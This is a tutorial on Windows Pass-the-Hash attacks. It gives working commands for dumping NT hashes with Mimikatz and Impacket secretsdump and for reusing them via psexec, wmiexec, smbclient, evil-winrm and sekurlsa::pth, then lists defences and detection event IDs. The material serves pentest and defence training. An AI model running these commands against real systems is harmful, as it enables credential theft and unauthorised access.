Pass-the-Hash (PtH) is one of the most effective lateral movement techniques in a Windows environment. Instead of cracking a captured password hash, an attacker simply reuses the hash itself to authenticate as the victim user. Windows NTLM authentication was designed to accept the hash as a credential equivalent — a design decision from the 1990s that continues to haunt enterprise networks today. Understanding how PtH works is essential for both offensive operators and defenders building detection strategies.
How NTLM Authentication Works
When a user logs into a Windows machine with a password, Windows computes an NT hash (MD4 of the UTF-16LE password) and stores it in the Security Account Manager (SAM) database or in the LSASS process memory. When that user authenticates to a remote resource over NTLM, the protocol uses a challenge-response mechanism where the client proves knowledge of the NT hash — without ever transmitting the plaintext password.
This means that if an attacker obtains the NT hash, they can impersonate that user to any service accepting NTLM authentication — no cracking required.
Dumping Hashes from LSASS
The most common hash source during an engagement is the LSASS process on a compromised machine. Tools like Mimikatz extract hashes directly from memory:
# Requires local admin or SYSTEM
privilege::debug
sekurlsa::logonpasswords
Output includes usernames and their NT hashes:
Username : jsmith
Domain : CORP
NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
The second part of the colon-separated string (8846f7eaee...) is the NT hash. The first part (aad3b435...) is the LM hash — effectively empty in modern Windows.
Impacket’s secretsdump can dump hashes remotely if you have valid credentials:
python3 secretsdump.py CORP/jsmith:Password123@192.168.1.10
You can also dump hashes offline from a SAM and SYSTEM hive backup:
python3 secretsdump.py -sam SAM -system SYSTEM LOCAL
Once you have an NT hash, you can authenticate as that user without knowing the password.
Using Impacket’s psexec.py
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20
This opens an interactive SYSTEM shell on the target.
Using wmiexec.py
python3 wmiexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20 "whoami"
wmiexec is slightly stealthier than psexec because it doesn’t write a service binary to disk.
Using smbclient.py
python3 smbclient.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
CORP/Administrator@192.168.1.20
This gives you an SMB shell to browse and exfiltrate files.
Evil-WinRM
evil-winrm -i 192.168.1.20 -u Administrator \
-H 8846f7eaee8fb117ad06bdd830b7586c
Evil-WinRM uses WinRM over port 5985 and accepts NT hashes directly. It also supports PowerShell script upload and Kerberos authentication.
Mimikatz (Local)
On a Windows pivot machine, Mimikatz can inject a hash into a new logon session:
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
This spawns a cmd.exe process running in the context of the specified user, using the hash for outbound NTLM authentication.
Why Local Admin Hashes Are Dangerous
If an organization uses the same local administrator password on all machines (a common, terrible practice), capturing one NT hash gives you lateral movement to every machine in the network. This is the core danger of PtH combined with password reuse.
Microsoft LAPS (Local Administrator Password Solution) was created specifically to randomize local admin passwords per machine, breaking this attack path. Its successor, Windows LAPS (built into Windows Server 2022 and Windows 11 22H2), stores passwords in Active Directory with access controls.
Defending Against Pass-the-Hash
1. Enable Protected Users Security Group
Add privileged accounts to the Protected Users group in Active Directory. Members cannot authenticate using NTLM — only Kerberos. This completely prevents PtH for those accounts.
Add-ADGroupMember -Identity "Protected Users" -Members "Administrator"
2. Disable NTLM Network Authentication
In environments that can support it, disable NTLMv1 and restrict NTLMv2 via Group Policy:
Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
- Set “Network security: LAN Manager authentication level” to “Send NTLMv2 response only. Refuse LM & NTLM”
- Consider blocking NTLM entirely for domain accounts via “Network security: Restrict NTLM”
3. Deploy Microsoft LAPS
Randomize local administrator passwords on every workstation and server. Without a common hash, lateral movement via PtH is dramatically limited.
4. Credential Guard
Windows Defender Credential Guard uses virtualization-based security (VBS) to isolate LSASS in a secure container, preventing tools like Mimikatz from dumping hashes from memory.
Enable via Group Policy: Computer Configuration > Administrative Templates > System > Device Guard > Turn On Virtualization Based Security
5. Privileged Access Workstations (PAWs)
Ensure domain admin credentials are only used from dedicated, hardened workstations. This limits where high-value hashes can be captured.
6. Detect with Event Logs
Monitor for:
- Event ID 4624 with Logon Type 3 (network) and Authentication Package = NTLM from unexpected sources
- Event ID 4625 — failed logon attempts (hash spraying)
- Event ID 7045 — new service installation (psexec artifact)
Security tools like Microsoft Defender for Identity and Splunk can correlate these events and alert on PtH patterns automatically.
Conclusion
Pass-the-Hash is a fundamental Windows lateral movement technique that works because NTLM was designed to treat the hash as the secret. For pentesters, mastering PtH tools like Impacket, Evil-WinRM, and Mimikatz is essential for demonstrating realistic attack paths in engagements. For defenders, the combination of Credential Guard, Protected Users, LAPS, and NTLM restrictions can reduce PtH exposure dramatically — even if you can’t eliminate NTLM entirely from your environment overnight.